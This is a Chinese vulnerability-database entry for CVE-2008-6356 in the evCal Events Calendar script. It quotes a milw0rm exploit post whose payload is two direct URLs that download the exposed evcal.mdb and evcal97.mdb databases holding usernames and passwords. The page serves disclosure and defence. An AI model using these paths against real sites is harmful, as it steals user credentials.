Donnafontenot evCal Events Calendar 'evcal.mdb和evcal97.mdb'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117009 漏洞类型 权限许可和访问控制
发布时间 2008-12-11 更新时间 2009-03-02
CVE编号 CVE-2008-6356 CNNVD-ID CNNVD-200903-010
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7419
https://www.securityfocus.com/bid/84545
https://cxsecurity.com/issue/WLB-2009030104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-010
|漏洞详情
evCalEventsCalendar在网站根目录下储存敏感信息,但没有赋予足够地访问控制,这会允许远程攻击者可以借助对(1)evcal.mdb和(2)evcal97.mdb提交一个直接的请求,下载一个包含用户名和密码的数据库。
|漏洞EXP
***********************************************************************************************************************************************************        
[!]                                                                                                                                                     [!]
[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
[!]                                 O    O            O                                 O      O                                                        [!]
[!]                                 O                 O                                       O                                                         [!]
[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
[!]                                           OO                                                                                                        [!]
[!]                                          OO                                                                                                         [!]
[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
[!]                                        OO                   WwW.Exploiter5.CoM My Web Site , WwW.No-Exploit.CoM  JiKo web site                      [!]
***********************************************************************************************************************************************************
+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                                       [ColdFusion Scripts evCal Events Calendar Remote Database Disclosure Vulnerability]                             ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
¦   Script   : http://www.funscripts.net/old_coldfusion/                                                  ¦       ¦                ![ ]!                  ¦
¦   Download : http://www.funscripts.net/old_coldfusion/download.php?fname=evcal                          ¦       ¦                                       ¦
¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
¦                                                          From The Dark Side Of MoroCCo                                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:                                                                                                                                                         :
¦  Remember    :                                                                                                                                          ¦
¦  -------------                                                                                                                                          ¦
¦                                                                                                                                                         ¦
¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
¦                                                                                                                                                         ¦

++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                                                             [!]  Mabrouk 3idkom   [!]                                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++


http://localhost/script/databases/evcal.mdb

Or

http://localhost/script/databases/evcal97.mdb



+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+----                                                                  ThanX To                                                                       ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City  ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
=                                                                    [AttaCk Is CompLet]                                                                  =
___________________________________________________________________________________________________________________________________________________________

# milw0rm.com [2008-12-11]
|受影响的产品
Donnafontenot Evcal Events Calendar -
|参考资料

来源:XF
名称:evcaleventscalendar-evcal-security-bypass(47265)
链接:http://xforce.iss.net/xforce/xfdb/47265
来源:MILW0RM
名称:7419
链接:http://www.milw0rm.com/exploits/7419
来源:SECUNIA
名称:34258
链接:http://secunia.com/advisories/34258